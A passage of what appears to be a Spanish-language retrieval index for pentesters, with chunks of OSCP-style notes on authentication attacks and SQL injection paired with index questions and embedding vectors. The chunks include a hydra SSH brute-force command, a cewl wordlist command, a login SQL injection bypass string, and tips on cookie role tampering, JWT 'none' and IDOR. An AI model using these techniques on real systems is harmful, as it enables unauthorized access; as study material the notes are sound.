-0.02334, -0.12275, 0.01564, 0.0759, 0.04189, -0.0286, -0.01295, -0.02356, -0.03697, 0.04326, -0.05059, 0.00887, 0.03675, 0.01337, -0.01845, -0.0669, 0.08972, -0.05167]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSH (si hay user vΓ‘lido):\nhydra -l bob -P rockyou.txt ssh://IP\n```\n- El `:F=mensaje` o `:S=Γ©xito` es lo que distingue fallo de acierto β†’ cΓ³gelo en Burp Repeater e Intruder.", "indexar": "quΓ© herramienta sirve para probar contraseΓ±as en SSH?", "v": [0.0594, -0.02795, -0.23252, -0.17194, 0.01089, -0.22723, -0.08369, -0.23106, 0.0231, 0.00909, -0.10384, 0.08672, 0.05322, -0.17723, 0.00103, 0.07193, 0.11138, -0.11136, -0.04024, 0.14759, 0.04772, -0.04141, -0.13597, -0.04437, -0.08627, -0.05614, 0.08401, 0.02199, -0.14684, 0.0629, -0.05754, -0.00288, 0.10309, -0.00089, -0.09459, 0.06502, -0.03179, 0.05375, 0.06265, 0.09339, 0.10405, 0.02256, -0.0893, 0.05979, 0.00692, 0.02282, -0.02831, 0.04729, -0.00253, 0.11369, -0.07175, -0.10735, -0.11606, -0.03564, -0.03062, -0.09598, 0.14926, -0.09734, 0.00848, -0.04629, -0.1536, -0.00708, 0.01225, 0.04087, -0.04146, -0.13946, 0.01778, -0.01456, -0.11135, 0.08139, -0.05311, 0.03867, -0.02249, 0.02854, -0.04884, 0.01513, 0.06591, 0.04853, 0.03617, 0.01857, -0.02984, -0.02881, -0.04551, -0.00786, -0.09473, -0.03825, 0.05195, -0.03444, 0.06595, -0.08081, 0.01128, 0.06746, 0.02876, 0.0493, 0.02782, -0.02057, 0.06309, -0.06067, -0.01213, -0.06768, 0.08294, -0.03362, -0.05906, 0.11969, -0.07742, 0.0003, -0.02548, 0.00816, -0.015, -0.04038, 0.06642, -0.01355, -0.05712, 0.01413, -0.02037, 0.03183, -0.04659, -0.09244, -0.02431, -0.0068, 0.0132, 0.00693, -0.07545, -0.00406, 0.0122, 0.06738, 0.01992, 0.0256, -0.03599, -0.06049, 0.03365, -0.03775, -0.05919, 0.06828, 0.01525, 0.02642, 0.06243, -0.14816, -0.0724, -0.04509, 0.00916, 0.00456, 0.00516, -0.08804, 0.02292, 0.07193, 0.05789, -0.00605, -0.05223, 0.03973, 0.01756, -0.07146, 0.01456, 0.0497, -0.0612, 0.00728, -0.02947, -0.07546, -0.09849, 0.13545, -0.05846, -0.07085, 0.00567, 0.05514, -0.01286, -0.04602, 0.02839, 0.00879, 0.06164, 0.0715, 0.07365, 0.04709, 0.05902, -0.0497, 0.0091, -0.05884, -0.05218, -0.037, -0.00622, -0.09223, -0.0197, -0.02353, -0.03752, -0.01545, 0.03147, -0.04674, 0.0681, -0.00124, 0.01487, 0.01653, 0.01611, 0.03128, -0.00631, -0.00788, 0.0229, 0.0254, 0.02551, -0.07699, 0.00488, -0.04468, -0.03805, -0.02041, -0.0883, -0.05504, 0.05907, 0.0472, -0.06371, -0.02848, -0.01301, 0.0135, 0.0412, 0.0118, 0.03213, -0.02979, -0.04625, -0.05224, -0.00976, 0.05766, -0.02984, 0.00523, 0.02028, -0.00098, 0.03114, 0.03415, -0.01001, 0.01541, -0.00224, 0.01925, 0.03597, -0.02619, 0.04384, 0.00664, -0.01098, 0.02498, 0.05353, -0.04063, -0.02355, -0.03185, -0.04425, -0.0375, -0.0674, 0.03107, -0.00118, -0.05349, -0.04816, -0.0463, 0.00064, -0.03523, -0.01881, -0.03215, -0.04858, 0.02632, 0.02893, -0.00315, 0.00901, -0.00783]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSH (si hay user vΓ‘lido):\nhydra -l bob -P rockyou.txt ssh://IP\n```\n- El `:F=mensaje` o `:S=Γ©xito` es lo que distingue fallo de acierto β†’ cΓ³gelo en Burp Repeater e Intruder.", "indexar": "con quΓ© puedo ejecutar ataques de fuerza bruta remotos?", "v": [0.10541, 0.03163, -0.17931, -0.04227, 0.04736, 0.15124, 0.14926, 0.06108, -0.00653, -0.05772, -0.08718, 0.00349, 0.05166, 0.0894, 0.10864, -0.04845, 0.01019, 0.02432, -0.06717, -0.09661, 0.03444, -0.17501, 0.10518, -0.00117, -0.07018, -0.02706, 0.02843, 0.18447, -0.06868, -0.10792, 0.04056, 0.06835, 0.12485, -0.05305, 0.03102, 0.05471, -0.06309, 0.11974, 0.09734, 0.05307, -0.00195, 0.0473, -0.18641, -0.12096, 0.05256, 0.01111, -0.00126, -0.00569, 0.02211, -0.04899, -0.04328, -0.02042, -0.1095, -0.10469, -0.09349, -0.09165, 0.13296, -0.09282, -0.03532, 0.03764, -0.06072, 0.02813, 0.03409, -0.05121, 0.05037, -0.08358, -0.0833, -0.07275, -0.08454, 0.00893, -0.15763, -0.03592, -0.02475, 0.04752, -0.02988, -0.00233, -0.04495, 0.03014, 0.03048, -0.00881, -0.09325, -0.00464, -0.15473, -0.05995, -0.1374, -0.08354, 0.02304, -0.0425, -0.07109, -0.09305, 0.10202, -0.06178, -0.01864, -0.00763, -0.0236, 0.06086, -0.0157, -0.0148, -0.03784, -0.05282, -0.05744, -0.02584, -0.0397, 0.01681, 0.07001, 0.00444, -0.01521, -0.00426, 0.02162, -0.03724, -0.03329, -0.04279, -0.03716, -0.06352, -0.03012, -0.05291, -0.11437, -0.07443, 0.04423, -0.00228, -0.13011, 0.00207, -0.0099, 0.06423, -0.00159, 0.01597, -0.01671, 0.06845, -0.00701, -0.0742, -0.0087, -0.00541, 0.0741, -0.05386, -0.00118, 0.03282, -0.004, -0.13781, 0.01832, -0.13366, 0.0528, 0.06771, 0.03613, -0.01681, 0.08861, 0.04956, 0.00597, -0.02637, -0.05255, 0.02155, 0.08207, -0.0164, 0.00686, 0.09442, -0.07998, -0.02172, -0.01362, -0.0947, -0.04497, 0.0809, -0.00858, 0.01081, -0.10608, -0.02032, -0.0045, 0.01164, -0.04949, -0.04017, 0.06037, 0.08481, -0.09236, 0.04916, 0.01934, -0.01258, -0.00139, -0.076, -0.04217, 0.01051, 0.00524, -0.01067, -0.06705, 0.01656, -0.04479, -0.02756, 0.03755, 0.03636, 0.04681, -0.01012, 0.0445, 0.02951, 2e-05, 0.0322, -0.04208, 0.01384, 0.00824, -0.06583, -0.07892, 0.02771, -0.01261, -0.00469, -0.02748, -0.07911, 0.02666, -0.03053, 0.08585, 0.04598, -0.0132, 0.03471, -0.04528, 0.06483, 0.02517, -0.05646, 0.09429, -0.06541, -0.07689, -0.03196, 0.02197, -0.03579, 0.02824, 0.01513, -0.02783, 0.03901, 0.0447, -0.0165, 0.01941, 0.02208, 0.0304, -0.06612, 0.04972, 0.03194, -0.00956, -0.02183, -0.0246, -0.0425, 0.00568, -0.01597, 0.01256, -0.03663, -0.06892, 0.04123, -0.03144, 0.07629, -0.01998, -0.08665, -0.05381, -0.05972, -0.12049, 0.00811, -0.04222, -0.03963, -0.02189, 0.04207, 0.08491, -0.01187, 0.00183, -0.03243]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SSH (si hay user vΓ‘lido):\nhydra -l bob -P rockyou.txt ssh://IP\n```\n- El `:F=mensaje` o `:S=Γ©xito` es lo que distingue fallo de acierto β†’ cΓ³gelo en Burp Repeater e Intruder.", "indexar": "cual es una alternativa libre a Hydra para hacer inyecciΓ³n de diccionario?", "v": [0.05433, -0.02566, -0.08151, 0.06382, 0.06929, -0.0074, -0.09508, -0.02433, -0.09942, 0.03791, -0.00972, -0.12695, -0.01361, -0.05398, 0.00775, -0.04709, 0.1342, -0.07433, -0.04565, -0.01999, -0.04083, 0.06223, -0.11286, -0.11415, -0.14372, -0.1182, -0.07604, 0.13281, -0.16748, -0.0617, -0.04911, 0.00934, 0.10095, 0.0722, -0.13603, 0.0858, 0.07414, 0.09436, 0.11793, -0.05261, -0.11043, -0.00276, 0.01139, 0.07712, -0.1043, 0.05731, -0.00667, -0.04238, 0.02104, -0.02299, 0.03313, -0.00528, -0.028, -0.02326, 0.05511, -0.05806, 0.1374, -0.05631, -0.09547, -0.00316, 0.04187, 0.01188, 0.07096, 0.00651, -0.07469, 0.05392, -0.07297, -0.04785, -0.00637, 0.13018, -0.02191, -0.0697, 0.04334, -0.00169, -0.04825, 0.01967, 0.00859, -0.05238, 0.0488, -0.00062, 0.05681, -0.04363, 0.01165, 0.01754, 0.01172, -0.0726, 0.13737, -0.08568, 0.1587, -0.04719, 0.06439, -0.02112, -0.02183, 0.13287, -0.06727, -0.0493, -0.01045, 0.04071, -0.05864, 0.07043, 0.1151, 0.03202, 0.00494, -0.03666, -0.00708, -0.00934, -0.04243, -0.02982, -0.04314, 0.0464, 0.10939, 0.04675, -0.00463, -0.08657, 0.08955, 0.00301, 0.00717, 0.01943, -0.00789, 0.06424, 0.01105, -0.02947, 0.00192, -0.04895, 0.02585, 0.01551, 0.04963, 0.00207, -0.0627, 0.0209, 0.12868, 0.04124, -0.08896, -0.09982, -0.06573, -0.02479, 0.075, -0.02021, -0.00886, -0.02739, -0.06184, 0.02087, -0.01504, -0.01891, -0.05876, -0.06647, 0.12894, -0.03054, 0.08782, -0.01386, -0.02811, -0.00093, 0.02458, 0.15222, 0.00514, -0.01024, -0.02605, -0.06076, -0.05384, 0.07674, 0.09747, -0.08791, 0.03341, 0.01611, -0.06223, -0.05905, -0.03543, -0.10523, -0.09364, -0.00843, 0.0539, 0.1042, 0.02735, 0.01403, 0.08509, 0.0093, 0.02261, -0.03809, 0.04753, -0.09441, -0.00574, -0.02837, -0.14717, -0.02742, 0.04107, -0.07666, 0.01559, 0.00955, -0.03822, 0.0759, -0.01529, -0.02282, -0.12712, -0.11436, 0.01942, 0.00168, 0.05621, 0.00957, 0.01569, -0.08598, 0.06343, -0.07891, 0.01274, -0.05064, -0.04145, -0.00691, -0.0053, -0.05038, -0.00731, 0.07693, 0.02192, 0.0661, 0.01401, 0.07507, -0.05752, -0.04359, 0.02614, 0.04572, 0.02781, -0.04968, 0.05477, 0.00846, -0.0396, -0.0097, -0.06284, -0.01079, 0.02942, -0.04032, -0.05593, 0.07141, 0.00953, -1e-05, 0.03494, -0.02412, 0.02066, 0.02307, -0.00531, 0.08551, 0.02205, -0.08149, 0.09727, 0.01326, -0.04203, 0.05623, -0.08132, -0.02888, -0.01141, -0.01102, -0.07253, -0.02883, -0.01337, 0.0439, 0.00586, 0.02389, 0.1198, -0.00038]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 3. Wordlists a medida\n```bash\ncewl http://IP -w custom.txt # palabras de la propia web", "indexar": "que herramienta sirve para generar una lista personalizada de palabras clave basada en el contenido de una web?", "v": [-0.08009, 0.06158, -0.12502, -0.18666, -0.04842, -0.19423, -0.10182, -0.01701, 0.01147, -0.18513, -0.03802, -0.08717, -0.00888, -0.09398, 0.07055, 0.06118, 0.11689, -0.17052, 0.03717, 0.04481, 0.01807, -0.03216, -0.12893, -0.09174, -0.15258, -0.117, 0.0558, 0.0107, -0.1269, 0.17549, -0.01569, 0.02503, -0.00464, -0.04623, -0.06817, 0.01317, -0.05104, 0.08831, -0.09719, 0.04789, -0.01075, 0.01381, -0.11709, 0.14567, -0.03571, 0.06085, -0.00883, 0.03885, 0.03309, 0.08042, -0.04133, -0.15696, -0.09221, -0.01925, -0.00796, -0.0885, 0.17991, -0.11719, -0.03597, -0.08707, -0.17858, 0.02632, -0.05232, -0.07697, -0.01512, -0.00439, 0.00618, 0.06374, 0.00391, 0.08121, -0.01627, -0.04223, 0.06547, -0.03578, 0.09524, 0.00683, 0.05079, 0.06784, -0.04221, 0.09394, 0.07503, -0.06355, -0.04766, 0.02338, -0.04468, -0.02936, 0.12654, 0.00168, 0.03575, -0.09157, -0.02022, 0.05288, -0.01525, 0.01129, -0.02097, -0.05274, 0.02393, -0.06056, 0.0524, -0.05337, 0.10572, -0.08769, -0.02227, 0.02683, 0.03346, 0.0399, 0.02853, -0.00308, -0.0844, 0.00247, 0.08601, 0.02032, 0.00384, -0.07675, -0.02605, 0.03586, -0.01059, -0.05194, 0.00372, -0.12289, -0.02039, 0.03116, -0.068, -0.0254, -0.02455, 0.06919, -0.065, 0.02344, -0.0319, -0.05613, 0.0141, 0.04873, -0.07786, -0.02808, 0.02235, -0.032, 0.01852, -0.0852, -0.00382, -0.00441, -0.01536, -0.02894, -0.07527, -0.0133, 0.01949, -0.07495, 0.08278, -0.01699, -0.11569, 0.02302, -0.03173, -0.05914, 0.03694, 0.01372, -0.1051, -0.01319, -0.07176, 0.00278, -0.05507, 0.06157, -0.00991, -0.0949, -0.04012, 0.06224, 0.05855, -0.0221, -0.06026, 0.06751, 0.07023, 0.08466, 0.01279, 0.0217, 0.09022, -0.07542, -0.00915, -0.00812, -0.05137, -0.00093, -0.09832, -0.09941, -0.07282, -0.06666, -0.06479, -0.01595, 0.02134, -0.06008, 0.04907, -0.01424, -0.05173, 0.02338, -0.06002, 0.03931, -0.05845, -0.02584, 0.04755, 0.0119, -0.02023, -0.00358, 0.03139, -0.05175, -0.00209, -0.06396, 0.02985, -0.01733, -0.03483, 0.0646, -0.0285, -0.03561, 0.00172, 0.02745, 0.00494, 0.02233, -0.03229, 0.00633, 0.00109, -0.00897, -0.02344, 0.02865, -0.0189, 0.02788, 0.05538, -0.00178, 0.02164, -0.00069, 0.00668, 0.00752, -0.0126, -0.00228, 0.04962, -0.01848, -0.04149, -0.03489, -0.00973, -0.00256, 0.00721, -0.05959, -0.00699, 0.0014, -0.05702, -0.00643, -0.04311, 0.01627, -0.02025, -0.03728, -0.0174, -0.036, -0.00301, -0.02901, -0.04806, -0.04484, -0.10682, -0.04192, 0.01507, -0.00439, 0.07073, -0.01055]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 3. Wordlists a medida\n```bash\ncewl http://IP -w custom.txt # palabras de la propia web", "indexar": "con que puedo crear un diccionario de tΓ©rminos especΓ­fico para mi sitio web?", "v": [0.08724, 0.14039, -0.04573, -0.00645, 0.09608, -0.11829, 0.0175, -0.06082, -0.09726, -0.07599, -0.01284, 0.01599, -0.05817, -0.15227, 0.04536, 0.02022, 0.14273, -0.14542, 0.03411, 0.01276, 0.07026, -0.14867, -0.00327, -0.02487, -0.07572, -0.18211, 0.09045, -0.05903, -0.11887, 0.04765, -0.03401, 0.09634, 0.06881, -0.0089, -0.02677, 0.04983, 0.08478, 0.04724, -0.10576, -0.01975, -0.04653, -0.05224, -0.08191, 0.13477, -0.10528, 0.05168, -0.06768, -0.06422, -0.03351, -0.04578, 0.09511, -0.0341, -0.13408, -0.00746, -0.00642, -0.0322, 0.18749, -0.08115, 0.0779, 0.05396, -0.07944, 0.01079, -0.02225, 0.03152, -0.03119, 0.03764, 0.00013, 0.11284, 0.00982, 0.06187, -0.06747, -0.02878, 0.10378, -0.08585, 0.18468, 0.04461, 0.04666, -0.02825, 0.03301, -0.07942, 0.03652, 0.00565, -0.02409, -0.03326, -0.1171, -0.01121, 0.02383, -0.01194, 0.09755, -0.10579, 0.07255, 0.02871, -0.0909, -0.02834, -0.1421, -0.05701, -0.00572, 0.01578, -0.04211, 0.02002, 0.05351, 0.03546, -0.01441, 0.02375, -0.01768, -0.02548, 0.06356, 0.02283, 0.00224, -0.05104, 0.16, -0.06778, -0.0346, -0.14193, 0.01424, -0.0074, -0.02503, -0.04063, 0.05651, -0.00074, -0.02361, -0.0357, 0.03712, 0.01868, -0.02519, -0.02066, 0.0147, 0.04235, -0.07076, -0.049, 0.03685, -0.00449, -0.08188, -0.06976, 0.01634, 0.0849, 0.05155, 0.03473, 0.06703, 0.02388, -0.03265, -0.08079, -0.12898, 0.00356, -0.02166, -0.08362, 0.08027, -0.04664, -0.07134, 0.0379, -0.0722, 0.05067, 0.03081, 0.03055, -0.06542, 0.05319, -0.00525, -0.01826, 0.03298, 0.04144, 0.01499, 0.00647, 0.02372, -0.06013, 0.02912, 0.00888, -0.09478, 0.01014, 0.03242, 0.0074, -0.04157, 0.05795, 0.0152, -0.02755, 0.03297, 0.04634, -0.0702, -0.03625, 0.00135, -0.12654, -0.06738, -0.05148, -0.10066, -0.03395, -0.05054, -0.08151, 0.1384, -0.02523, -0.09019, 0.10787, -0.04941, 0.01456, -0.08411, -0.0452, 0.03734, 0.02423, 0.00607, 0.03915, -0.03041, -0.11264, 0.02689, -0.05865, 0.00812, -0.02107, -0.0562, 0.0088, -0.00637, -0.04125, 0.03008, 0.00497, -0.01939, 0.00367, -0.02684, -0.02638, -0.07113, -0.02064, 0.08921, 0.04701, -0.0006, -0.01959, 0.06031, 0.05271, -0.02872, 0.01318, 0.01346, 0.02415, 0.03222, -0.06515, 0.03787, 0.02858, -0.04197, -0.00388, -0.01248, -0.0719, 0.01431, -0.00393, 0.01027, 0.00011, -0.07021, 0.00725, -0.00293, 0.03109, -0.01331, -0.03925, -0.0589, -0.06642, -0.04375, 0.01933, -0.06477, -0.02147, -0.04758, -0.01375, -0.01278, -0.03994, 0.08829, -0.0083]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 4. Bypass (no fuerza bruta)\n- **SQLi en el login** β†’ `' OR '1'='1'-- -` β†’ SQL injection.\n- **Cookies/roles manipulables**: `isAdmin=false` β†’ `true`, `role=user` β†’ `admin` (en Burp Suite).\n- **JWT**: alg `none`, secreto dΓ©bil (`jwt_tool`, crackeo con rockyou).\n- **IDOR**: cambia `?id=1` por `?id=2` y accedes a datos de otro.\n- **Cookie/sesiΓ³n robada** vΓ­a XSS.\n\nRelacionado: Burp Repeater e Intruder Β· SQL injection Β· OSCP MOC", "indexar": "que tecnica sirve para manipular los roles en una cookie sin forzar el login?", "v": [0.11496, -0.09711, -0.11586, -0.11035, -0.00983, -0.24513, -0.08568, 0.17901, 0.03378, -0.04359, -0.05172, -0.01808, 0.09378, 0.01973, -0.00087, -0.10295, 0.09451, -0.05807, 0.11547, 0.03644, 0.05706, 0.02926, 0.01794, -0.00502, 0.08841, 0.02475, 0.07347, -0.13522, -0.18907, -0.05838, -0.04442, -0.02341, 0.06451, -0.05298, -0.02648, 0.02904, 0.01945, -0.06433, 0.05439, 0.1537, -0.10455, -0.01413, 0.03864, 0.0608, 0.03609, 0.0844, 0.01813, 0.00973, 0.13108, 0.13278, 0.06107, 0.01785, 0.02294, 0.08402, -0.02204, -0.07423, 0.08284, -0.10477, 0.01084, -0.03933, -0.07578, -0.01553, 0.07876, 0.06415, 0.05422, -0.01073, 0.03649, -0.0465, 0.08596, 0.03715, -0.03852, -0.00208, 0.01962, -0.05791, 0.02179, -0.01144, -0.01007, 0.03504, 0.06029, -0.04217, 0.02566, -0.03595, -0.1106, 0.03773, -0.0299, 0.05964, -0.00092, -0.07976, 0.05682, -0.0791, 0.02807, 0.11332, -0.01801, -0.11404, 0.03336, 0.0075, 0.003, -0.00709, 0.07893, 0.00821, 0.11121, -0.04598, -0.05439, 0.11319, -0.022, -0.03817, 0.06418, -0.11828, 0.04855, 0.01028, -0.09053, 0.03168, -0.08641, -0.03775, 0.0784, 0.20792, -0.0249, -0.01822, -0.12993, -0.06817, 0.00563, -0.11855, -0.02507, -0.0028, -0.06102, 0.00414, 0.02516, 0.00592, -0.02549, -0.0654, -0.12886, 0.0864, -0.04834, 0.11242, 0.03105, -0.04066, 0.15155, -0.07526, -0.07323, 0.02436, 0.05253, 0.07545, 0.0643, -0.07644, -0.06313, 0.03992, 0.09726, 0.01419, 0.00385, -0.09088, 0.05035, -0.01651, 0.03388, 0.09183, 0.01596, -0.02628, 0.00248, -0.05202, 0.00087, 0.0365, -0.02112, -0.06409, -0.058, -0.03938, 0.03062, 0.0128, -0.06786, -0.13033, 0.09607, 0.06512, -0.02598, -0.00451, 0.05471, 0.00775, 0.03135, -0.04307, -0.02981, 0.06615, -0.02345, 0.02858, 0.03007, -0.05735, 0.09698, 0.00824, 0.02079, 0.01188, -0.04751, -0.00833, -0.03469, 0.0548, 0.04551, -0.00499, -0.04233, 0.00149, -0.05538, -0.04509, -0.02455, 0.02366, 0.03181, -0.01132, 0.1124, 0.0187, 0.02236, 0.02834, -0.02959, 0.04061, 0.01535, -0.05473, -0.01329, 0.00541, 0.06572, -0.00833, 0.0059, 0.03918, 0.00734, -0.0485, 0.05103, 0.00659, 0.02228, 0.00705, 0.0354, -0.02894, -0.01826, -0.03456, -0.05137, 0.04891, 0.02897, 0.02488, -0.01479, -0.01445, 0.00527, 0.04152, -0.00682, 0.0566, 0.02314, -0.00959, 0.04934, -0.01846, -0.04068, -0.06758, -0.02059, 0.03455, -0.04664, -0.02592, -0.03331, -0.0429, -0.07179, 0.00444, 0.03029, -0.03105, -0.03502, -0.02485, 0.02345, -0.0022, 0.05089, -0.0124]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 4. Bypass (no fuerza bruta)\n- **SQLi en el login** β†’ `' OR '1'='1'-- -` β†’ SQL injection.\n- **Cookies/roles manipulables**: `isAdmin=false` β†’ `true`, `role=user` β†’ `admin` (en Burp Suite).\n- **JWT**: alg `none`, secreto dΓ©bil (`jwt_tool`, crackeo con rockyou).\n- **IDOR**: cambia `?id=1` por `?id=2` y accedes a datos de otro.\n- **Cookie/sesiΓ³n robada** vΓ­a XSS.\n\nRelacionado: Burp Repeater e Intruder Β· SQL injection Β· OSCP MOC", "indexar": "cual es un metodo valido para acceder a datos de otro usuario cambiando solo el id?", "v": [0.00257, 0.13337, -0.19872, -0.01917, -0.03221, -0.04192, -0.05958, -0.08203, -0.16089, -0.03899, -0.06728, -0.24199, -0.04578, -0.05168, -0.00452, -0.06779, 0.21964, -0.07264, 0.00758, -0.08043, 0.0174, -0.07962, -0.00964, -0.09689, -0.10567, 0.04911, 0.02218, -0.04972, -0.06041, 0.14255, 0.0208, -0.01694, -0.01862, -0.05354, -0.0807, 0.00639, 0.04972, 0.13059, -0.10946, 0.02242, -0.01486, -0.03324, -0.02793, 0.01503, 0.07115, -0.01007, -0.07332, 0.04247, 0.01697, 0.08594, 0.01957, -0.01826, -0.15418, -0.0953, -0.01487, -0.06511, 0.17409, -0.09347, -0.00287, -0.01905, 0.01314, 0.02046, 0.06668, 0.12874, -0.03489, -0.07685, 0.01951, 0.05951, -0.06959, 0.16406, 0.04137, 0.01673, 0.00131, -0.05756, 0.02795, -0.01748, 0.10872, -0.03762, 0.0599, -0.0113, -0.12237, -0.01529, -0.11227, 0.00537, -0.11048, -0.02309, 0.14048, -0.13162, -0.0087, -0.04492, 0.07447, 0.01371, 0.08335, 0.01498, 0.03928, -0.00713, -0.01343, -0.08762, -0.00519, 0.02156, 0.04402, 0.05595, -0.10296, 0.10357, 0.04115, 0.02124, 0.00573, 0.0094, -0.0935, -0.0756, -0.02832, 0.02948, -0.02739, 0.01719, -0.00863, 0.01357, -0.01911, -0.07865, -0.04972, -0.06545, -0.08981, -0.01027, 0.00478, -0.0271, 0.00956, -0.05722, 0.00683, 0.09162, -0.02548, 0.04774, -0.01835, 0.01622, -0.04632, 0.06955, 0.03197, 0.00606, -0.04614, -0.02675, -0.0107, -0.00686, -0.00788, 0.04615, -0.02631, -0.00229, 0.04733, -0.09304, 0.01287, -0.04227, -0.13825, -0.05123, -0.03388, 0.02754, -0.02359, 0.08535, -0.08602, 0.03678, -0.01823, -0.11624, -0.04562, 0.05214, -0.05863, 0.04822, 0.04075, 0.01556, 0.00193, -0.07908, 0.00109, -0.06869, 0.05099, 0.00519, -0.02612, 0.03601, -0.01045, -0.04387, 0.04087, -0.04746, -0.10509, -0.10624, -0.02321, -0.00828, 0.03214, 0.0167, -0.01073, -0.05106, 0.01784, -0.04223, -0.00306, -0.00622, 0.01661, 0.04184, 0.02014, 0.05809, 0.0031, -0.03947, -0.00174, -0.02282, -0.0038, 0.01969, 0.03124, -0.04995, -0.05952, 0.05776, 0.04046, 0.00442, 0.00347, 0.02537, -0.00362, -0.06762, -0.0036, -0.04421, 0.03936, -0.05428, 0.07863, -0.01412, -0.05112, -0.02466, -0.02039, -0.03242, -0.01804, 0.01692, 0.01471, 0.01678, 0.03028, 0.00307, -0.09181, 0.02972, 0.04148, -0.03601, -0.01693, 0.01499, -0.02589, -0.0266, 0.01024, -0.01332, 0.09761, 0.04982, 0.00586, -0.04099, -0.08365, -0.10588, 0.05851, 0.05322, 0.00235, -0.01328, 0.01924, -0.03055, -0.14897, 0.0686, -0.00287, -0.11203, -0.04368, -0.06282, -0.00462, -0.02505, 0.01931, -0.08249]} -{"tipo": "pregunta", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## 4. Bypass (no fuerza bruta)\n- **SQLi en el login** β†’ `' OR '1'='1'-- -` β†’ SQL injection.\n- **Cookies/roles manipulables**: `isAdmin=false` β†’ `true`, `role=user` β†’ `admin` (en Burp Suite).\n- **JWT**: alg `none`, secreto dΓ©bil (`jwt_tool`, crackeo con rockyou).\n- **IDOR**: cambia `?id=1` por `?id=2` y accedes a datos de otro.\n- **Cookie/sesiΓ³n robada** vΓ­a XSS.\n\nRelacionado: Burp Repeater e Intruder Β· SQL injection Β· OSCP MOC", "indexar": "como puedo explotar la falta de validacion en las sesiones o cookies para robarlas?", "v": [0.02538, -0.10281, -0.10476, -0.00546, -0.07438, -0.19577, 0.08121, 0.21188, 0.01236, -0.0566, -0.21774, -0.14201, 0.12734, -0.0076, 0.04226, 0.00501, -0.029, 0.12936, 0.02157, 0.00783, 0.0343, -0.01171, -9e-05, 0.05382, 0.13665, 0.09214, 0.0558, -0.03305, -0.0666, 0.08579, -0.041, -0.04559, 0.07801, -0.08164, -0.08924, 0.06366, 0.01318, -0.03819, -0.00124, -0.03542, 0.05135, 0.04374, -0.01778, -0.05236, 0.11818, -0.08169, -0.08111, 0.02154, 0.04483, -0.00484, 0.09744, -0.08494, -0.08593, 0.01914, 0.03012, 0.01392, 0.0617, -0.12627, -0.02963, 0.00086, -0.05658, 0.05449, -0.02732, 0.03078, 0.15007, 0.00321, 0.01154, 0.0296, 0.0734, 0.08617, -0.02291, 0.03095, -0.03852, 0.00114, 0.14831, -0.04073, -0.01183, 0.0529, 0.03845, 0.05052, 0.01162, -0.05737, -0.08638, 0.05041, -0.07702, 0.05825, 0.11867, -0.04434, -0.04706, -0.01995, 0.06713, 0.12949, -0.08182, -0.11441, -0.03751, -0.07964, 0.09973, 0.02214, 0.03865, 0.06262, 0.07502, 0.04114, -0.09022, 0.126, 0.01025, 0.01588, -0.06704, 0.01973, 0.08195, -0.1253, -0.14566, -0.06948, -0.08662, -0.05915, 0.08162, 0.06007, -0.11309, 0.01724, -0.13066, -0.04734, 0.02824, -0.09662, -0.1153, -0.03678, -0.02672, -0.0505, -0.03593, 0.08126, -0.03382, -0.08764, -0.06412, 0.09667, 0.03558, 0.09735, -0.00576, 0.01119, 0.02116, -0.02381, -0.02109, -0.07705, -0.01281, 0.0588, 0.03899, 0.00853, 0.02742, 0.07965, -0.04411, 0.00789, 0.01861, -0.14016, 0.02285, -0.05323, 0.03203, 0.07588, 0.03978, 0.03354, 0.06158, -0.02951, -0.00195, 0.0622, -0.06067, -0.03772, -0.07357, -0.00162, -0.02029, -0.04934, -0.05317, -0.026, 0.05855, 0.00641, 0.03123, -0.00754, 0.05218, -0.02374, 0.04146, 0.01516, -0.0179, -0.03892, 0.00356, -0.03659, -0.03458, -0.01545, 0.01799, -0.01164, -0.02481, 0.03135, 0.03225, 0.01947, -0.02162, 0.03004, 0.09362, -0.02856, -0.03864, 0.07206, -0.00316, -0.05308, -0.00381, 0.03548, 0.04386, 0.03955, 0.0505, 0.02336, -0.0504, 0.05194, 0.07743, 0.028, -0.03092, 0.00774, -0.04868, -0.02449, 0.03243, 0.03799, 0.08021, -0.03975, -0.03608, -0.01535, 0.04462, 0.07412, -0.04302, -0.03068, -0.01219, 0.06806, 0.03913, 0.00591, -0.01018, 0.06345, -0.0501, -0.01961, -0.00164, 0.05188, -0.011, 0.03895, -0.03344, 0.022, 0.03667, -0.00813, 0.04541, -0.00681, -0.01483, -0.02623, -0.02319, 0.05936, -0.0437, 0.04827, -0.04637, -0.00739, -0.09853, 0.04218, 0.07731, -0.02509, 0.01651, 0.02884, -0.00719, -0.02937, 0.02104, -0.04537]} -{"tipo": "pregunta", "herramienta": "SQL injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# SQL injection\n\n> Aprende **manual primero** (en Burp Repeater e Intruder). `sqlmap` a veces miente β€” y en el examen estΓ‘ limitado (Reglas de herramientas). Vector de Hacking web.", "indexar": "Que programa puedo usar para hacer inyecciones SQL manualmente?", "v": [-0.06059, 